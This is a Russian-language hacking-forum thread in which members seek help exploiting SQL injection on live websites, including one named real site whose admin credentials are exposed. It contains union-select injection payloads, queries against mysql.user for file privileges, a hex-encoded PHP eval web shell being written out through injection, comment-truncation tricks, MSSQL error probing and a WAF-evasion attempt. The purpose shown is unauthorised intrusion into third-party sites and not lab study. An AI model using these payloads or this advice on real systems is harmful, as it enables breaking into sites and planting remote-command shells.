Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    Спасибо, попробую.
     
  2. Satd

    Satd New Member

    Joined:
    13 Apr 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Привет. Нашел сайт может не я один наверное)) у него есть sql уязвимость через который доступна логин пасс админа. Но под админом не могу залить шелл подскажите как быть. вот оно http://www.planetsmag.com/index.php?issueid=63 .
     
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    там ворд пресс есть, брутишь пасс и заливаешся
     
  4. Satd

    Satd New Member

    Joined:
    13 Apr 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    А можно разжевать для меня немного))
     
  5. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    1. Вам нужна таблица wp_users.
    2. Способы заливки.
     
  6. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,550
    Likes Received:
    172
    Reputations:
    99
    чем можно просканировать сайты на sql инъекции ?
    знаю что можно проверять эти уязвимости и получать данные через havij, а как сайты проверять на наличие уязвимостей ? есть ли програмки ?
    havij не может сканировать домены на наличие дырок sql ?
     
    #23486 GAiN, 19 Aug 2014
    Last edited: 19 Aug 2014
  7. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Различного уровня сканеров полно в интернете.
    Белов делал небольшую подборку на хабре: http://habrahabr.ru/post/125317/
     
    1 person likes this.
  8. Wcfs

    Wcfs New Member

    Joined:
    7 Jun 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Нужна помощь.
    Нашёл sql, пытаюсь залить шелл, проверяю file_priv и выскакивает ошибка. Не могу разобраться, что делаю не так.
    Code:
    id=-31+union+select+1,2,3,4,file_priv,6,7,8,9,10,11,12,13+from+mysql.user--
    Ошибка такая:
    Code:
    You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1
     
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Wcfs, ты перевести текст неможешь? у тебя синактичесткая ошибка при запросе, скорее всего ковычки фильтруются
     
  10. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    519
    Likes Received:
    15
    Reputations:
    -4
    Привет!
    Делаю запрос
    На что выдает Y Unknown column 'id' in 'where clause'


    Далее пытаюсь залить шелл
    На что выдает You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select '',2 from mysql.user in' at line 1

    Как правильно составить запрос, чтобы не выскакивала ошибка?
     
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    сам шелл нужно хексить

     
    _________________________
    #23491 winstrool, 20 Aug 2014
    Last edited: 20 Aug 2014
  12. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Подскажите, где в паблике найти уязвимости/эксплоиты старых версий galleryproject.org (интересуют версии 2.2 и 2.1)
     
  13. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    519
    Likes Received:
    15
    Reputations:
    -4

    Захексил, выполнил запрос и вот что выдает:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and id<>-14 union select 0x3c3f706870206576616c28245f524551554553545b636d645d29' at line 1

    Такое ощущение что какоето ограничение на кол-во символов в запросе
     
    #23493 Evil_Genius, 21 Aug 2014
    Last edited: 21 Aug 2014
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Такое ощущение, что нужно угадывать, что именно вы там делаете, давайте урл посмотрим, иначе курите мануалы!
     
    _________________________
  15. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Такое ощущение, что вы копируете сюда не те запросы, которые выполняете.


    По первому:
    1) У рута file_priv есть по умолчанию.
    2) Колонки id в mysql.user нет.
    3) Если запрос таки правильный, вставьте комментарий в конец.

    По второму:
    1) Действительно, копируйте запрос.
    2) Если ограничение на длину, проверьте простым вписыванием длинной строки в хексе.
    3) Ошибка синтаксиса - это все еще ошибка синтаксиса. Начните с запроса, который выполняется корректно, а потом доводите до шелла.
     
  16. none222

    none222 Guest

    Reputations:
    0
    тут беда в том что ты не обрубил имеющийся в скрипте запрос.
    поставь в конце %23 или +--+ или /* что прокатит
     
  17. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Привет
    вопрос по MSSQL2000 with error:
    ....../xyz.asp?param=99%27
    Code:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '99'' to a column of data type int.
    
    Но
    ....../xyz.asp?param=99%20AND%201=1
    возвращает
    Code:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '99 and 1=1' to a column of data type int.
    
    можно что-то сделать? или тут не сможем повлиять на исполнение запроса?
     
  18. GAiN

    GAiN Elder - Старейшина

    Joined:
    2 Apr 2011
    Messages:
    2,550
    Likes Received:
    172
    Reputations:
    99
    на некоторых сайтах когда проверяешь на sql инъекцию то идёт редирект, как это реализуется на php ?
     
  19. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    PHP:
    if(!is_numeric($_GET['id'])) {
       
    header('Location: /');
       exit;
    }
     
    _________________________
  20. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    56
    Likes Received:
    16
    Reputations:
    0
    есть скуля.

    1.подбирал кол-во полей - 18
    Code:
    site.com/index.php?id=15+order+by+18+--+
    2.Пытаюсь узнать принтабельное поле
    Code:
    site.com/index.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
    3. срабатывает mod security. "select" загоняю в char
    Code:
    site.com/index.php?id=15+union+CHAR(115, 101, 108, 101, 99, 116)+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
    возращает такую ошибку:
    что с этим делать?
     
Thread Status:
Not open for further replies.